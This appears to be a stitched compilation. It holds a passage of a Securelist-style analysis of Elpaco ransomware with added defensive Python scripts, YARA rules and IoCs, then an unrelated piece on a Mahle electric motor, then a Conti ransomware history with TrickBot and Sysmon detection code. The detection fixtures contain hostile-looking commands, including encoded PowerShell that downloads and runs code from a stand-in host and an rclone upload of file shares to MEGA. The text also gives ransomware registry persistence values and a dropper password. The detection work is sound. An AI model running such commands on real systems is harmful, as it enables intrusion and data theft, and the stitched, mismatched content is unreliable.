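The RunProgram line above is the 7-Zip SFX installer configuration, a text block that 7-Zip self-extractors carry between the markers ";!@Install@!UTF-8!" and ";!@InstallEnd@!". The script below is an added example, not part of the Securelist write-up: it locates that block in a file, parses its Key="Value" settings and pulls the archive password out of the 7za.exe command, so an analyst can unpack the inner archive statically rather than by running the dropper. The sample bytes it ships with are constructed from the RunProgram and "Everything Setup..." strings quoted in this article, not taken from a real sample.

```python
"""Recover the 7-Zip SFX configuration from a self-extracting dropper.

Added example, not from the Securelist write-up. 7-Zip SFX executables carry
their installer settings as a text block bracketed by ";!@Install@!UTF-8!"
and ";!@InstallEnd@!"; RunProgram is the command run after extraction, and
for Elpaco it is the 7za.exe call that carries the archive password.
"""
import re
import sys

SFX_START = b";!@Install@!UTF-8!"
SFX_END = b";!@InstallEnd@!"

# Constructed sample: filler bytes around a config block built from the
# RunProgram line quoted in the article. Not a real dropper.
SAMPLE_DROPPER = (
    b"MZ" + b"\x00" * 64
    + SFX_START + b"\r\n"
    + b'Title="Everything Setup..."\r\n'
    + b'RunProgram="hidcon:7za.exe x -y -p7183204373585782 Everything64.dll"\r\n'
    + SFX_END + b"\r\n"
    + b"\x00" * 32
)


def find_sfx_config(data: bytes):
    """Return (offset, {key: value}) for the first SFX config block, or (None, {})."""
    start = data.find(SFX_START)
    if start < 0:
        return None, {}
    end = data.find(SFX_END, start)
    if end < 0:
        return None, {}
    block = data[start + len(SFX_START):end].decode("utf-8", errors="replace")
    config = {}
    # Each setting is one line of the form Key="Value".
    for m in re.finditer(r'^\s*(\w+)="(.*)"\s*$', block, re.MULTILINE):
        config[m.group(1)] = m.group(2)
    return start, config


def archive_password(config):
    """Pull (password, archive) out of a 7za.exe "x ... -p<pw> <archive>" command."""
    cmd = config.get("RunProgram", "")
    m = re.search(r"\b7za?\.exe\b.*?-p(\S+)\s+(\S+)", cmd)
    return (m.group(1), m.group(2)) if m else None


def report(path):
    """Print the config block found in the file at `path`."""
    with open(path, "rb") as f:
        data = f.read()
    offset, config = find_sfx_config(data)
    if offset is None:
        print("no 7-Zip SFX config block found")
        return
    print(f"SFX config at offset {offset:#x}")
    for key, value in config.items():
        print(f"  {key} = {value}")
    creds = archive_password(config)
    if creds:
        print(f"  archive {creds[1]} is protected with password {creds[0]}")


if __name__ == "__main__":
    if len(sys.argv) > 1:
        report(sys.argv[1])
    else:
        print(find_sfx_config(SAMPLE_DROPPER))
```

The offset it reports corresponds to the kind of address shown in front of the RunProgram string above (2e434 in the article's sample); with the password in hand, the archive can be opened with an ordinary 7-Zip build on an analysis machine.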
When executed, the malware unpacked the archive and dropped the necessary files into the %AppData%\Local directory, inside a separate directory with a randomly generated UUID as the name.
C:\Users\user\AppData\Local\BD3FDDDF-6CAF-3EBC-D9CF-C8DF72D8F78A\
Destination directory
Sample contents
The archive contents are required for encrypting files and performing additional tasks in the operating system.
For example, the DC.exe binary is the Defender Control tool for enabling and disabling Windows Defender. It is triggered by the sample once unpacked.
Defender Control (DC.exe) software
The sample also drops a file called session.tmp into the same destination directory. This is a session key for resuming encryption if the malicious process is interrupted, for example by a process kill.
session.tmp file
However, the most interesting artifact is svhostss.exe, which is the main console used by the malware. It is worth mentioning that this name closely mimics svchost.exe, a legitimate Windows process. This naming pattern is often used by threat actors to confuse less experienced individuals during memory analysis. The svhostss.exe file is indeed the binary that performs malicious instructions. The malware comes with a GUI under the name gui40.exe, located in the same directory. It interacts with the console and facilitates operations like customizing ransomware properties, such as a ransom note or allowed directories/files, and performing actions in the target system.
DC.exe is called during runtime by svhostss.exe, with the /D available command for disabling
In the GUI, the operator can select entire drives for encryption, perform a process injection to hide malicious processes, customize the ransom note, change the encryption extension, set the order of encryption based on the original file format, and exclude specific directories, files or formats from encryption.
It is also possible to kill certain processes specified by the operator and execute system commands, all of which makes this threat highly customizable.
Data import and export
The sample allows for the import and export of malware configuration files according to the parameters set by the operator. There are several built-in templates within the malware for the operator to choose from. The image below shows an exported configuration file; note that each configuration is preceded by a number that represents its ID.
The console interface, running alongside the GUI, gathers detailed information about the system, including drives and file shares.
Information gathering by svhostss.exe
The malware creates the following registry keys — note that all files with the default .ELPACO-team extension are classified as “mimicfiles” and configured to open the ransom note (Decryption_INFO.txt).
HKLM\SOFTWARE\Classes\.ELPACO-team\: "mimicfile"
HKLM\SOFTWARE\Classes\mimicfile\shell\open\command\: "notepad.exe "C:\Users\user\AppData\Local\Decryption_INFO.txt""
Also, the artifact configures the Run registry key to execute svhostss.exe and display the ransom note at startup.
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svhostss: ""C:\Users\user\AppData\Local\BD3FDDDF-6CAF-3EBC-D9CF-C8DF72D8F78A\svhostss.exe""
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svhostss.exe: "notepad.exe "C:\Users\user\AppData\Local\Decryption_INFO.txt""
It is noteworthy that the main binary, svhostss.exe, lacks significant protection from analysis, so we were able to easily see certain command executions performed by the malware.
Runtime strings
We were also able to find suspicious imports of the functions FindFirstFileW, WriteFile, FindNextFileW and ShellExecuteW. The first three are typically used in ransomware samples for file manipulation, while the last is often used for calling an external program, such as PowerShell, cmd.exe or a third-party component, to delete the malware.
Function imports
Elpaco, like other Mimic variants, uses the SetSearchW function exported from the legitimate Everything DLL to search the victim’s files, as shown in the images below. Interestingly enough, we detected no functions for data exfiltration.
SetSearchW function
Detection and analysis evasion
The artifact encrypts the victim’s files with the stream cipher ChaCha20. The key for this cipher is encrypted by the asymmetric encryption algorithm RSA-4096 — without the key we were unable to decrypt the files.
As shown in the image below, all procedures performed by the ransomware during execution are logged to C:\temp\MIMIC_LOG.txt. The artifact also drops a copy of the session.tmp key file into the same C:\temp directory.
MIMIC_LOG.txt file
The last step in malware execution is calling the Del command to delete all executables, configuration files, DLLs, batch files and database-related files in the ransomware directory. Interestingly enough, before deleting, the sample uses the fsutil LOLBin, as shown in the image above, to securely erase the svhostss.exe file, leaving no possibility of recovery.
YARA rules
Based on our analysis of the sample, we developed the following YARA rules for detecting both the dropper and the console interface used by the GUI. The rules take into account the file type, relevant strings and library imports.
Elpaco dropper:
import "pe"

rule elpaco_dropper
{
    meta:
        author = "Kaspersky - GERT"
        description = "Yara rule for detecting the Elpaco dropper."
        target_entity = "file"
    strings:
        $s1 = "-p7183204373585782" wide ascii nocase
        $s2 = "Everything64.dll" wide ascii nocase
        $s3 = "ELPACO-team.exe" wide ascii nocase
    condition:
        (2 of ($s*)) and pe.imports("SHELL32.dll", "ShellExecuteW") and pe.imports("KERNEL32.dll", "LoadLibraryA")
}
svhostss.exe (console interface):
import "pe"

rule elpaco_console
{
    meta:
        author = "Kaspersky - GERT"
        description = "Yara rule for detecting the Elpaco/Mimic main console."
        target_entity = "file"
    strings:
        $s1 = "powershell.exe -ExecutionPolicy Bypass" wide ascii nocase
        $s2 = "Software\\Classes\\mimicfile\\shell\\open\\command" wide ascii nocase
        $s3 = "cmd.exe /c DC.exe /D" wide ascii nocase
        $s4 = "MIMIC_LOG.txt" wide ascii nocase
        $s5 = "mimicfile" wide ascii nocase
        $s6 = "Everything Setup..." wide ascii nocase
        // $s7 = "   (the value of this string is truncated in the source and is left out so the rule compiles)
    condition:
        (5 of ($s*)) and pe.imports("Everything32.dll", "Everything_SetSearchW") and pe.imports("bcrypt.dll", "BCryptGenRandom")
}
Victims
We used these YARA rules on public sources to detect threat actors who had recently used the Elpaco sample and other Mimic variants, mainly in the United States, Russia, the Netherlands, Germany and France. However, their presence was not limited to those countries, with further cases detected in Canada, Romania, South Korea, the United Kingdom and so on.
Top 5 countries targeted by Mimic
The following chart shows the evolution of Mimic appearances per month.
Mimic appearances per month, 2024
The collected data shows that Mimic variants, including Elpaco, have been used by attackers at least since August 2023.
Conclusion
In this incident, we observed that the Elpaco ransomware is a Mimic variant that abused the Everything DLL, which is used for file discovery. The artifact presented an interesting user interface for customizing its attributes, while allowing the operator to export the parameters to a configuration file. Unfortunately, the encryption algorithm makes it impossible to decrypt the files on an infected machine without the private key, which makes this threat hard to deal with. Another feature of Elpaco is that it deletes itself after encrypting files to evade detection and analysis. We have observed attacks with Elpaco and other Mimic samples on a massive scale, targeting a wide range of countries worldwide, and we’ll continue monitoring this threat.
Kaspersky products detect the threat described in this article with the following verdicts:
- HEUR:Trojan-Ransom.Win32.Generic (dropper).
- HEUR:Trojan-Ransom.Win32.Mimic.gen (svhostss.exe).
Tactics, techniques and procedures
Below are the TTPs identified from our malware analysis.
Tactic | Technique | ID |
Discovery | Network Share Discovery | T1135 |
Execution | Command and Scripting Interpreter: Windows Command Shell | T1059.003 |
Execution | Command and Scripting Interpreter: PowerShell | T1059.001 |
Impact | Data Encrypted for Impact | T1486 |
Impact | Service Stop | T1489 |
Impact | Inhibit System Recovery | T1490 |
Defense evasion | Abuse Elevation Control Mechanism: Bypass User Account Control | T1548.002 |
Defense evasion | Masquerading | T1036 |
Defense evasion | Modify Registry | T1112 |
Defense evasion | Disable or Modify System Firewall | T1562.004 |
Defense evasion | Process Injection | T1055 |
Defense evasion | Hide Artifacts | T1564 |
Persistence | Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder | T1547.001 |
Indicators of Compromise
- 61f73e692e9549ad8bc9b965e25d2da683d56dc1 (dropper)
- 8af05099986d0b105d8e38f305efe9098a9fbda6 (svhostss.exe)
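The registry changes described earlier (the .ELPACO-team association with the "mimicfile" class, the notepad.exe ransom-note handler and the svhostss Run values) and the two SHA-1 indicators above are the kind of artifacts a responder would sweep a host for. The script below is an added example, not Kaspersky's code: it checks registry entries supplied as (key, value_name, data) tuples so the logic runs on any platform (on Windows, live_run_key_entries() reads the HKLM Run key through winreg), and walks a directory tree for files whose SHA-1 matches the published IoCs or whose names match the dropped artifacts. The demo() input is constructed from the values quoted in this article plus one invented benign Run value as a control.

```python
"""Host triage against the Elpaco indicators in this write-up.

Added example, not from the Securelist post. Registry data is passed in as
(key, value_name, data) tuples so the logic runs anywhere; on Windows,
live_run_key_entries() reads HKLM's Run key through winreg.
"""
import hashlib
import os
import sys
import tempfile

# SHA-1 indicators published in the article.
IOC_SHA1 = {
    "61f73e692e9549ad8bc9b965e25d2da683d56dc1": "Elpaco dropper",
    "8af05099986d0b105d8e38f305efe9098a9fbda6": "svhostss.exe (console)",
}
# File names the article lists as dropped or written at runtime.
ARTIFACT_NAMES = {"svhostss.exe", "mimic_log.txt", "decryption_info.txt", "session.tmp"}
RUN_KEY = r"SOFTWARE\Microsoft\Windows\CurrentVersion\Run"


def check_registry(entries):
    """entries: iterable of (key_path, value_name, data). Returns findings."""
    findings = []
    for key, name, data in entries:
        k, n, d = key.lower(), str(name).lower(), str(data).lower()
        if "\\classes\\" in k and d == "mimicfile":
            findings.append(("file-association", key, data))
        elif "\\classes\\mimicfile\\shell\\open\\command" in k:
            findings.append(("ransom-note-handler", key, data))
        elif k.endswith("\\currentversion\\run") and (
                "svhostss" in n or "svhostss.exe" in d or "decryption_info.txt" in d):
            findings.append(("run-key-persistence", f"{key}\\{name}", data))
    return findings


def live_run_key_entries():
    """Read HKLM Run values on Windows; return [] elsewhere."""
    if sys.platform != "win32":
        return []
    import winreg
    entries = []
    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, RUN_KEY) as key:
        index = 0
        while True:
            try:
                name, data, _ = winreg.EnumValue(key, index)
            except OSError:
                break
            entries.append(("HKLM\\" + RUN_KEY, name, data))
            index += 1
    return entries


def sha1_of(path, chunk=1 << 20):
    """Stream a file through SHA-1 so large files do not need to fit in memory."""
    digest = hashlib.sha1()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            digest.update(block)
    return digest.hexdigest()


def check_files(root):
    """Walk root; report IoC hash matches and dropped-artifact file names."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for fn in files:
            path = os.path.join(dirpath, fn)
            if fn.lower() in ARTIFACT_NAMES:
                findings.append(("artifact-name", path))
            try:
                digest = sha1_of(path)
            except OSError:
                continue
            if digest in IOC_SHA1:
                findings.append(("ioc-hash", path, IOC_SHA1[digest]))
    return findings


def demo():
    """Run both checks on constructed input: the registry values quoted in the
    article plus one invented benign Run value, and a scratch directory that
    mimics the UUID-named drop folder holding an empty svhostss.exe."""
    reg = [
        (r"HKLM\SOFTWARE\Classes\.ELPACO-team", "", "mimicfile"),
        (r"HKLM\SOFTWARE\Classes\mimicfile\shell\open\command", "",
         r'notepad.exe "C:\Users\user\AppData\Local\Decryption_INFO.txt"'),
        (r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run", "svhostss",
         r'"C:\Users\user\AppData\Local\BD3FDDDF-6CAF-3EBC-D9CF-C8DF72D8F78A\svhostss.exe"'),
        (r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run", "svhostss.exe",
         r'notepad.exe "C:\Users\user\AppData\Local\Decryption_INFO.txt"'),
        (r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run", "ExampleUpdater",
         r"C:\Program Files\Example\updater.exe"),  # benign control, constructed
    ]
    with tempfile.TemporaryDirectory() as tmp:
        drop = os.path.join(tmp, "BD3FDDDF-6CAF-3EBC-D9CF-C8DF72D8F78A")
        os.makedirs(drop)
        for fn in ("svhostss.exe", "readme.txt"):
            open(os.path.join(drop, fn), "wb").close()
        file_findings = check_files(tmp)
    return check_registry(reg), file_findings


if __name__ == "__main__":
    reg_hits, file_hits = demo()
    for hit in reg_hits + file_hits:
        print(hit)
    for hit in check_registry(live_run_key_entries()):
        print("LIVE", hit)
```

A name match alone is only a lead, since svhostss.exe is a deliberate look-alike and an empty file of that name is not the console; the hash match is the strong signal, and the registry findings tie a host to the persistence and file-association changes even after the sample has deleted itself.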
securelist.com/elpaco-ransomwa…
Electric Motors Run Continuously at Near-Peak Power
For a lot of electrical and mechanical machines, there are nominal and peak ratings for energy output or input. If you’re in marketing or advertising, you’ll typically look at the peak rating and move on with your day. But engineers need to know that most things can only operate long term at a fraction of this peak rating, whether it’s a power supply in a computer, a controller on an ebike, or the converter on a wind turbine. But this electric motor system has a unique cooling setup allowing it to function at nearly full peak rating for an unlimited amount of time.
The motor, called the Super Continuous Torque motor and built by German automotive manufacturer Mahle, is capable of 92% of its peak output power thanks to a unique oil cooling system which is able to remove heat at a rapid rate. Heat is the major limiter for machines like this; typically, when operating at a peak rating, a motor would need to reduce power output to cool down so that major components don’t start melting or otherwise failing. Given that the largest of these motors have output power ratings of around 700 horsepower, that’s quite an impressive benchmark.
The motor is meant for use in passenger vehicles but also tractor-trailer style trucks, where a motor able to operate at its peak rating would mean a smaller size motor or less weight or both, making them easier to fit into the space available as well as being more economically viable. Mahle is reporting that these motors are ready for production so we should be seeing them help ease the transportation industry into electrification. If you’re more concerned about range than output power, though, there’s a solution there as well so you don’t have to be stuck behind the times with fossil fuels forever.
Thanks to [john] for the tip!
The Story of Conti Ransomware – War in the Age of Ransomware (Episode 2)
This is the continuation of the Conti story. You can read the previous part, which covered the group’s origins, in the dedicated article. Here we will explore the group’s internal components and how its ecosystem slowly began to collapse. Wizard Spider is still full of surprises, and in this episode we will reveal the most forbidden ones.
The Fool – Trick or Treat
Mid-2021: Conti dominates the headlines with constant attacks and ransom payments from victims. The RaaS operation has made a name for itself in the ecosystem, attracting the attention of everyone involved, including victims, affiliates and law enforcement. But this is only one piece of the whole puzzle.
TrickBot operations never stopped; in fact, they kept evolving. As written in the previous article, TrickBot became a popular tool even outside Conti operations thanks to the move to a Malware-as-a-Service (MaaS) model. For a monthly fee, anyone could use the notorious modular Trojan, which was under constant development (in this CyberInt article you can find some of the modules and distribution methods).
The US federal government needed to counter ransomware and digital attacks, which had received a huge boost from the new underground environment that exploded after the Ransom Cartel. A small step back to 2020: the US elections were scheduled for November 3. When we described the Wizard Spider/Conti toolset in the previous article, we also covered the capabilities of Ryuk Stealer. Some of its features included the automatic exfiltration of files containing specific keywords (in the name and in the contents) strongly related to assets of various Western governments.
All of this highlighted that the group behind Ryuk, TrickBot and Conti had particular political interests beyond merely financial goals. Naturally, the origin of the attacks was attributed to Russians. The United States was worried about potential influence over, or sabotage of, the upcoming election, which motivated law enforcement to launch offensive operations against the TrickBot botnet infrastructure.
US Cyber Command (never confirmed by the agency itself), led by NSA director Paul M. Nakasone, carried out a disruption operation against the entire TrickBot botnet infrastructure in 2020. In September the botnet was flooded with deliberately falsified configuration files that set the C2 server address to the localhost IP address.
Snippet of the configuration files (KrebsOnSecurity)
The new configuration broke the Trojan’s communications, effectively blocking part of its operations, in particular ransomware attacks. In addition, Microsoft undertook a series of legal actions to take TrickBot’s machines fully offline. In less than two weeks the company managed to take down 120 of 128 servers (source: Microsoft).
A hard blow for TrickBot, but not for long… actually shorter than expected. Somehow the “evil” developers had built in a recovery mechanism designed to restore the interrupted communication channels with TrickBot agents in case the infrastructure was modified. Resilience seemed to be the TrickBot group’s top priority. The operation was not a waste just because the threat recovered and adapted so quickly on the technical level: it was a message to everyone, showing the US government’s proactive stance against digital attacks and criminal environments.
Paul M. Nakasone’s direction, under the Trump administration, was clear: “persistent engagement”, “defend forward” and “hunt forward” rather than passive prevention and mitigation. There is no evidence that TrickBot was used specifically against targets for election-sabotage purposes, but ransomware attacks via the Trojan continued at the same pace even after Biden’s election.
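The poisoned configs described above are easy to spot once decoded: every C2 entry points at loopback. As an added example (not from the original article and not from any published tooling), here is a small Python check an analyst could run over decoded configs. The XML layout is a simplified approximation of TrickBot’s decoded `mcconf` format (version, group tag and a list of `srv` entries), and both sample configs are constructed; the TEST-NET addresses in the “clean” sample stand in for real C2 servers.

```python
import ipaddress
import xml.etree.ElementTree as ET

# Constructed samples, loosely modelled on TrickBot's decoded <mcconf> layout.
# Not real captures: the "before" C2 addresses are RFC 5737 documentation IPs.
SAMPLE_CONFIGS = {
    "before_disruption": """
        <mcconf><ver>1000508</ver><gtag>lib543</gtag>
          <servs><srv>203.0.113.10:443</srv><srv>198.51.100.7:449</srv></servs>
        </mcconf>""",
    "after_disruption": """
        <mcconf><ver>1000509</ver><gtag>lib543</gtag>
          <servs><srv>127.0.0.1:1</srv><srv>127.0.0.1:1</srv></servs>
        </mcconf>""",
}


def parse_c2_servers(config_xml):
    """Return the (host, port) pairs listed in the config's <servs> block."""
    root = ET.fromstring(config_xml)
    servers = []
    for srv in root.iter("srv"):
        host, _, port = srv.text.strip().rpartition(":")
        servers.append((host, int(port)))
    return servers


def classify_c2(host):
    """Label a C2 host as 'loopback', 'unroutable', 'routable' or 'hostname'.

    Deliberately does not use ipaddress.is_private, which would also flag the
    documentation ranges used in the sample; the disruption signature is
    specifically loopback/unspecified/link-local/reserved targets."""
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        return "hostname"
    if addr.is_loopback:
        return "loopback"
    if addr.is_unspecified or addr.is_link_local or addr.is_reserved:
        return "unroutable"
    return "routable"


def assess_config(config_xml):
    """Flag a config as poisoned when no listed C2 is reachable from the bot."""
    servers = parse_c2_servers(config_xml)
    flagged = [(h, p) for h, p in servers if classify_c2(h) != "routable"]
    return {
        "servers": servers,
        "flagged": flagged,
        "poisoned": bool(servers) and len(flagged) == len(servers),
    }


if __name__ == "__main__":
    for label, cfg in SAMPLE_CONFIGS.items():
        print(label, assess_config(cfg))
```

A config with a mix of routable and loopback entries is reported but not marked `poisoned`, since the bot would still reach the surviving servers; that distinction matters when judging whether a disruption actually cut a victim off or only degraded the botnet.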
Paul M. Nakasone
An arrest warrant for TrickBot’s developers and maintainers was issued in August 2020. We had to wait until early 2021 for some of these individuals to be handcuffed: in February, “Max” became the first TrickBot member to face Lady Justice.
Ladies and gentlemen, Alla Witte, 55 years old, aka “Max”.
Before discussing the charges she faced, a brief note on how Alla Witte was (allegedly) uncovered. First of all, take a look at the URLhaus page for “Max”’s personal website. Note the keyword “RED”.
It was not the first time Witte mixed her personal life with her underground activities: in December 2019 she infected one of her own devices with TrickBot, which stole the data and stored everything the device contained on the C2 server (source: Hold Security). Moreover, on her social media profiles Witte mentions “Max” as someone very close to her. In short, operational security (OPSEC) was not among Alla Witte’s sharpest skills, leaving gaps that were useful to the law enforcement agencies trying to de-anonymize “Max”.
At the time, Witte lived in Suriname and worked as a freelance web developer. The arrest took place in Miami on February 6, 2021. The charges against her included:
- Computer fraud and aggravated identity theft
- Development, administration and maintenance of TrickBot
- Distribution of TrickBot
- Wire and bank fraud
- Money laundering
The full indictment can be found on the official website of the US Department of Justice, and something interesting emerges from the investigation: Alla Witte’s reputation inside the group. Most members knew her gender and real name, and referred to her the way a son would to his mother. She had prestige for her technical skills, and TrickBot members were genuinely happy to learn that Witte was in charge of the development process.
The investigation found that TrickBot’s origin lies in the Dyre banking trojan. In 2023 Alla Witte was sentenced to 2 years and 8 months in prison.
The list was still long and Witte was only the tip of the iceberg. The next individual is Vladimir Dunaev, aka “FFX” (38 years old). A resident of Russia (Yakutsk region), in mid-October 2021 Vladimir was arrested in South Korea (the reasons for his travel there were not disclosed) and extradited to the United States. He would face trial with a maximum of 60 years in prison.
Vladimir Dunaev
BleepingComputer, at the time, published a table taken from the indictment showing Dunaev’s activities within the TrickBot group.
FFX pleaded guilty in 2023 and on March 20, 2024 was sentenced to 5 years and 4 months in prison. TrickBot’s developers were put under pressure by these two arrests. US government officials stated that they had identified other individuals responsible for the distribution, development or money-laundering activities related to the modular Trojan’s group.
TrickBot operations did not stop, but it is clear that the battlefield had changed: Conti and the governments of the main Western countries would now be fighting head to head!
The Hermit – Snatch & Snitches
In August 2021 the ransomware scene turned from stray cat into urban panther: LockBit 2.0 is out, the flow of money is bigger than ever, and the Colonial Pipeline attack and the Initial Access Broker market have made the business more popular. The ecosystem is now mature, with a touch of “professionalism”, but what happens when the “dark companies” lack transparency and honesty?
We should look at what happened with the XSS forum user called m1Geelka.
This (really angry) former Conti affiliate leaked the manuals given to attackers for exfiltrating data and deploying the ransomware. The guides covered the Active Directory environment, enumeration, and common attacks abusing misconfigurations or known vulnerabilities (PrintNightmare, EternalBlue and ZeroLogon).
In order: why did this person get angry? In his blog post it is quite clear that the motivation was lower payments based solely on “how much they [Conti] will say the victim paid”. The affiliate program was 70/30, 70% to the attackers and 30% to the RaaS; the point is the difference between what Conti demanded and the actual ransom amount. Unfortunately nothing critical leaked: no source code, no secret chats and no identities revealed. Wait a while for that )).
Some specifics used by affiliates were uncovered: heavy use of Cobalt Strike, PowerShell scripts, and procedures to exfiltrate data (installing RDP agents and uploading everything to MEGA/FileZilla). The more technical readers will pause for a moment with a look of surprise on their faces: the procedure described is simple, really basic.
Somehow the Conti staff wanted to create documentation for inexperienced attackers, probably for two reasons: ease of deception and “quantity over quality” through standardized attacks. If the affiliate’s words were true, it would mean that the total payout for an attack was $2,100; even without knowing the victim in question, that is rather unrealistic given that the average ransom (at the time) amounted to more than $100K. We can believe the affiliate’s words with a good degree of confidence.
Like “legal” companies do, Conti was taking advantage of some of its workers purely for profit. The guide contained some IP addresses and a few minor IoCs that several major vendors added to their solutions, which is useful for profiling the Conti threat.
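The leaked playbook is basic precisely because it leans on off-the-shelf tooling, and that is also what makes it detectable. As an added example (not from the original article, not from the leaked manuals, and not from any vendor’s rule set), the Python below runs a handful of rules of the kind a SOC would derive from that playbook (encoded PowerShell, domain-admin enumeration, cloud-upload tooling, remote-access software) over constructed Sysmon-style process-creation records, decodes the `-EncodedCommand` payload so the analyst can read it, and then correlates per host to surface the discovery-then-upload sequence. The host names, users, paths and the 192.0.2.5 download URL are all constructed; the ATT&CK technique IDs are the standard ones for those behaviours.

```python
import base64
import json
import re


def ps_encoded(script: str) -> str:
    """PowerShell -EncodedCommand is base64 over UTF-16LE text (used here only
    to build the constructed sample event)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed Sysmon-style process-creation records. Not real telemetry.
SAMPLE_EVENTS = [
    json.dumps({"host": "WS-042", "user": "CORP\\jdoe",
                "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                "cmdline": "powershell.exe -nop -w hidden -enc "
                           + ps_encoded("IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.5/a')")}),
    json.dumps({"host": "WS-042", "user": "CORP\\jdoe", "image": r"C:\Windows\System32\net.exe",
                "cmdline": 'net group "Domain Admins" /domain'}),
    json.dumps({"host": "FS-01", "user": "CORP\\svc_backup", "image": r"C:\Users\Public\rclone.exe",
                "cmdline": r"rclone.exe copy D:\Shares\Finance mega:finance --transfers 8"}),
    json.dumps({"host": "FS-01", "user": "CORP\\svc_backup", "image": r"C:\Users\Public\AnyDesk.exe",
                "cmdline": "AnyDesk.exe --silent"}),
    json.dumps({"host": "WS-007", "user": "CORP\\asmith",
                "image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
                "cmdline": "WINWORD.EXE /n"}),
]

# Matches -e / -ec / -enc / -EncodedCommand followed by a base64 blob.
ENC_RX = re.compile(r"\s-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{20,})", re.I)

RULES = [
    ("T1059.001", "encoded PowerShell command",
     re.compile(r"powershell(?:\.exe)?\b.*\s-e(?:c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I)),
    ("T1087.002", "domain account enumeration",
     re.compile(r'\bnet(?:1)?(?:\.exe)?\s+group\s+"?domain admins"?|\badfind(?:\.exe)?\b', re.I)),
    ("T1567.002", "cloud upload tooling",
     re.compile(r"\b(?:rclone|megasync|megacmd|filezilla)(?:\.exe)?\b", re.I)),
    ("T1219", "remote access tooling",
     re.compile(r"\b(?:anydesk|atera|splashtop)(?:\.exe)?\b", re.I)),
]


def decode_encoded_powershell(cmdline):
    """Recover the script behind -EncodedCommand; None if absent or malformed."""
    m = ENC_RX.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def scan(events):
    """Apply every rule to every record; one finding per (record, rule) hit."""
    findings = []
    for raw in events:
        ev = json.loads(raw)
        for technique, desc, rx in RULES:
            if not rx.search(ev["cmdline"]):
                continue
            finding = {"host": ev["host"], "user": ev["user"], "technique": technique,
                       "desc": desc, "cmdline": ev["cmdline"]}
            if technique == "T1059.001":
                finding["decoded"] = decode_encoded_powershell(ev["cmdline"])
            findings.append(finding)
    return findings


def hosts_with_exfil_chain(findings):
    """Hosts where upload tooling co-occurs with discovery, encoded PowerShell
    or remote-access software: the playbook's sequence, not a lone admin."""
    by_host = {}
    for f in findings:
        by_host.setdefault(f["host"], set()).add(f["technique"])
    precursors = {"T1059.001", "T1087.002", "T1219"}
    return sorted(h for h, t in by_host.items() if "T1567.002" in t and t & precursors)


if __name__ == "__main__":
    hits = scan(SAMPLE_EVENTS)
    for h in hits:
        print(h["host"], h["technique"], h["desc"], h.get("decoded") or "")
    print("exfil chain on:", hosts_with_exfil_chain(hits))
```

The per-host correlation is the part worth keeping: `rclone` on a file server is ambiguous on its own, but `rclone` plus `AnyDesk` on the same host within the same hunt window is the manual’s own recipe.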
Screenshot of Conti’s Active Directory Manual
If you want to get hands-on with the leak’s contents, ForbiddenProgrammer has created a public GitHub repository with everything you need.
Four of Swords – Operational Briefing
So far we have covered a lot about Conti in terms of evolution and timeline, but before continuing our journey we need to stop and mention some attacks carried out by the Conti RaaS in 2021. We already discussed the ransomware attack against the Irish HSE, so let’s look at other significant operations.
- London Graff Jewellers: At the end of October Conti managed to exfiltrate and encrypt data from Graff Jewellers, a well-known British brand. Conti published 61,000 files on its DLS, claiming they were only 1% of all the files exfiltrated; the files contained billing and shipping information for VIPs such as David Beckham, Donald Trump and members of Arab royal families. Graff had to shut down its networks and, during the forensic investigation, concluded that the data of 11,000 customers had been stolen. Conti demanded tens of millions in ransom. On November 11 Conti decided to publish an update on the London Graff attack, stating that it would permanently delete the files relating to the Arab, UAE and Qatari families, while it would release the data relating to the “neoliberal plutocracy of the US, UK and EU”. An interesting statement: the “soul” of the group pushed them to hurt Western countries as much as possible in every attack they carried out. The Daily Mail is also cited for the article that made the RaaS realize what kind of data had been stolen, consistent with Conti’s own admission that it had not properly analyzed the exfiltrated contents.
- JVCKenwood: The Japanese multinational also had the honor of being published on Conti’s DLS: a $7 million ransom for the decryptor and for not publishing the 1.7 TB that had been stolen; as proof they provided a PDF scan of an employee’s passport. The servers hit were those responsible for sales in Europe. The company stated that the unauthorized access to its servers originated from a subsidiary based in Europe; the professionals’ hypothesis is that Conti bought the access from an IAB.
- ExaGrid: Less than a month after the Irish HSE attack, a new victim had to reckon with Conti: ExaGrid, a tiered backup company. The group claimed to have encrypted SQL servers and file servers, stealing 800 GB of data. They stayed inside the network for a month, “enough to study all your documentation”. The company negotiated until May 13, when a deal was reached: at first the RaaS offered a $1 million discount, but the negotiations ended with an agreement to pay $2.6 million. A curious detail is that after the decryptor was sent, ExaGrid requested a new one because the original had been destroyed by mistake. This attack was a critical blow to the prestige of a company that had received 7 industry awards for being among “the best solutions for recovery procedures after ransomware attacks”.
- Broward County Public Schools: On March 7, 2021, the Broward County public school district found its infrastructure destroyed and unavailable. It did not take long before they found a ransom note from the “ContiLocker Team” with a link to the negotiation chat. Here we have some screenshots of the chat that are quite interesting to read. Conti demanded a $40 million ransom since, as they stated, the affected district has revenue of $2 billion. To the RaaS it seemed a “reasonable” price for recovery. Broward County is a public school district, not a private one, but Conti claimed otherwise: when the victim’s representative offered a $500,000 payment, the group replied with “Guys, you were hired by Broward Schools and we know exactly who you are […] We paid and hired the outsourcing company and we know exactly that your recovery company received a wire transfer from Broward (bankofamerica), that’s why we are ready to accept $10 million”. The representative held his position, and Conti decided to abandon the negotiation and publicly upload the chat.
